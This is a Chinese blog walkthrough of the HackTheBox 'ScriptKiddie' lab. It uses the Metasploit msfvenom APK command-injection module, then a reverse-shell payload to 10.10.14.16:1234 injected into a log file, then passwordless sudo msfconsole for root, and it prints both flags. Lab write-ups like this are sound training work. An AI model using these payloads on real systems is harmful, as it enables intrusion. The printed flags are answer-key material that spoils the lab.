写点什么

【渗透测试】hackthebox 靶场之 ScriptKiddie

用户头像
Thrash
关注
发布于: 2021 年 05 月 22 日

0x01 信息收集



端口扫描:namp -A -sS -sV -sC 10.10.10.226



开放了 22 和 5000 端口(开启了 Werkzeug httpd 0.16.1 服务),使用浏览器打开 5000 端口



是一个黑客工具集,类似于 CTF 中在线 ping 工具存在命令执行漏洞的一样,这时候就是开始漏洞搜索了。


0x02 漏洞搜索且利用

Nmap 设置 127.0.0.1 扫描一下,发现 nmap 的版本是 7.80



Msf 搜一下漏洞:


searchsploit -c Nmap
复制代码

发现并没有能利用的漏洞



搜索第二个工具,搜索 venom 时发现有个 apk 模板注入,我们可以利用这个试试看。(使用第三个在线工具也可以搜索 venom)



这时候就可以利用 msf 生成一个 apk 的马


use exploit/unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection //使用此exp
复制代码

发现只需要填写 kali 的 IP 地址和监听端口(4444)





set lhost 10.10.14.16 //设置本机IP地址exploit //生成木马
复制代码

可知木马生成完毕,在/root/.msf4/local/路径下



然后开始监听 4444 端口


nc -lvvp 4444
复制代码

然后把生成的 apk 木马上传到第二个工具



然后 getshell!我们升级一下 shell


SHELL=/bin/bash script -q /dev/null
复制代码


然后在根目录拿到 user flag:


 ec09611a1d4cf67b831700b176aa70bc
复制代码



0x03 提升权限

进入 home 目录,发现除了 kid 用户目录,还有一个 pwn 用户目录



查看 pwn 目录下的文件,发现有个 scanlosers.sh 的脚本文件,cat 文件内容



通过脚本文件的代码审计,发现它会一直扫描/home/kid/logs/hackers 日志文件的 IP 地址。

该脚本未对 hackers 文件传入的内容做过滤并且 hackers 文件是 kid 用户可编辑的,可以通过写入恶意代码,利用命令注入获得 pwn 用户的 shell,在 logs 目录下输入:(记住有空格)


echo  "  ;/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.16/1234 0>&1' #" >> hackers
复制代码



1234 端口成功反弹 shell



Sudo -l 发现 msf 拥有 root 权限并且不需要密码



不多说,直接进入 msf


sudo /opt/metasploit-framework-6.0.9/msfconsole
复制代码



在 root 目录下,拿到 root flag:


525a323ae46ff873d1a88e68fe6484a6
复制代码


用户头像

Thrash

关注

还未添加个人签名 2021.04.06 加入

还未添加个人简介

评论

发布
暂无评论
【渗透测试】hackthebox靶场之ScriptKiddie